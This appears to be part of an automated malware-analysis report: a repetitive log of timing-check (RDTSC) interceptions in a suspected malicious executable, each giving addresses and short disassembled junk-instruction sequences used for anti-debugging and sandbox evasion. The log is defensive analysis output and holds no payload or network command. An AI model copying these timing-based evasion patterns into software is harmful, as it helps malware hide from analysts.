Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D68C45 second address: D68C4F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2BDC8ABB16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D6937C second address: D69380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D69380 second address: D69384 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D69384 second address: D6939A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F2BDCD5A7A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F2BDCD5A7AAh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D6939A second address: D693A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D68392 second address: D683C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F2BDCD5A7BBh 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 jg 00007F2BDCD5A7A6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D683C0 second address: D683DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007F2BDC8ABB23h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D683DE second address: D683E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D7122F second address: D71239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F2BDC8ABB16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D71239 second address: D7124F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2BDCD5A7A6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jp 00007F2BDCD5A7A6h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D70D85 second address: D70D89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D70D89 second address: D70DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F2BDCD5A7B8h 0x0000000d pop esi 0x0000000e push edx 0x0000000f jno 00007F2BDCD5A7B2h 0x00000015 js 00007F2BDCD5A7B2h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D70DC5 second address: D70DCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D70F08 second address: D70F14 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D79BAD second address: D79BB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D785BF second address: D785C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D78854 second address: D78858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D78858 second address: D7885D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D789FF second address: D78A10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2BDC8ABB1Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D78A10 second address: D78A16 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D78A16 second address: D78A1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D78A1F second address: D78A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D78A25 second address: D78A31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F2BDC8ABB16h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D7CA12 second address: D7CA30 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jc 00007F2BDCD5A7A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jl 00007F2BDCD5A7A6h 0x00000013 push edi 0x00000014 pop edi 0x00000015 pop esi 0x00000016 jl 00007F2BDCD5A7B2h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D7CA30 second address: D7CA36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D7C246 second address: D7C253 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jno 00007F2BDCD5A7A6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D7C4C8 second address: D7C4DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2BDC8ABB20h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D7C4DD second address: D7C4E2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D7FF8A second address: D7FFA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F2BDC8ABB23h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D7FFA4 second address: D7FFE3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F2BDCD5A7B3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007F2BDCD5A7B8h 0x00000013 pop eax 0x00000014 popad 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jnp 00007F2BDCD5A7A6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D7FFE3 second address: D7FFE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D80294 second address: D80299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D803D6 second address: D803FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB1Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2BDC8ABB25h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D803FB second address: D8040E instructions: 0x00000000 rdtsc 0x00000002 js 00007F2BDCD5A7A6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8040E second address: D80412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D80412 second address: D80420 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2BDCD5A7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D89681 second address: D89687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D89687 second address: D8968B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8968B second address: D896B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB27h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F2BDC8ABB16h 0x00000013 jbe 00007F2BDC8ABB16h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D87C18 second address: D87C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D87C1E second address: D87C27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D87C27 second address: D87C2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D87C2D second address: D87C31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D87C31 second address: D87C64 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2BDCD5A7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007F2BDCD5A7BEh 0x00000017 jmp 00007F2BDCD5A7B8h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D87C64 second address: D87C6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D87C6A second address: D87C86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D87C86 second address: D87C90 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2BDC8ABB1Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D87F74 second address: D87F8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 jnc 00007F2BDCD5A7AAh 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D87F8C second address: D87F90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D88264 second address: D88269 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D88269 second address: D882C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F2BDC8ABB16h 0x0000000a pop esi 0x0000000b jmp 00007F2BDC8ABB22h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F2BDC8ABB24h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F2BDC8ABB24h 0x00000020 jmp 00007F2BDC8ABB25h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D882C9 second address: D882CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D88DF3 second address: D88DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D890C8 second address: D890D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F2BDCD5A7A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D890D6 second address: D890DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D890DC second address: D890EA instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2BDCD5A7A8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D890EA second address: D89104 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB1Ah 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D89104 second address: D8911D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F2BDCD5A7B0h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8911D second address: D89123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D89123 second address: D89129 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8D548 second address: D8D54D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8D54D second address: D8D552 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8D552 second address: D8D55D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8D55D second address: D8D563 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8C92B second address: D8C94E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jnl 00007F2BDC8ABB16h 0x0000000b jmp 00007F2BDC8ABB26h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8CAAA second address: D8CAB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8CAB0 second address: D8CABA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8CABA second address: D8CABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8CC36 second address: D8CC3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8CC3A second address: D8CC40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8CC40 second address: D8CC8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2BDC8ABB1Fh 0x0000000b popad 0x0000000c pushad 0x0000000d jo 00007F2BDC8ABB28h 0x00000013 jmp 00007F2BDC8ABB22h 0x00000018 jp 00007F2BDC8ABB2Bh 0x0000001e push ebx 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8CDE0 second address: D8CDEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F2BDCD5A7A6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8CDEC second address: D8CDF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8CF75 second address: D8CF7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8CF7D second address: D8CF8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007F2BDC8ABB16h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8CF8A second address: D8CF90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8D0F0 second address: D8D0F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8D0F4 second address: D8D0F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8D0F8 second address: D8D100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D8D100 second address: D8D105 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D91D92 second address: D91DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pop eax 0x00000007 jns 00007F2BDC8ABB16h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f popad 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push edi 0x00000017 pop edi 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D978D7 second address: D978E3 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2BDCD5A7AEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D978E3 second address: D97905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2BDC8ABB26h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D97AD1 second address: D97AD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D97AD5 second address: D97ADB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D980C5 second address: D980CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D980CB second address: D980EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB29h 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D9837A second address: D98380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D9863B second address: D9865D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F2BDC8ABB28h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D9865D second address: D98661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D987EB second address: D987EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D996D6 second address: D996DF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D996DF second address: D996E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D996E5 second address: D996F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 ja 00007F2BDCD5A7A6h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D996F2 second address: D99704 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2BDC8ABB1Ch 0x00000008 je 00007F2BDC8ABB16h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: D99704 second address: D9971B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2BDCD5A7B3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: DA0A8E second address: DA0A93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
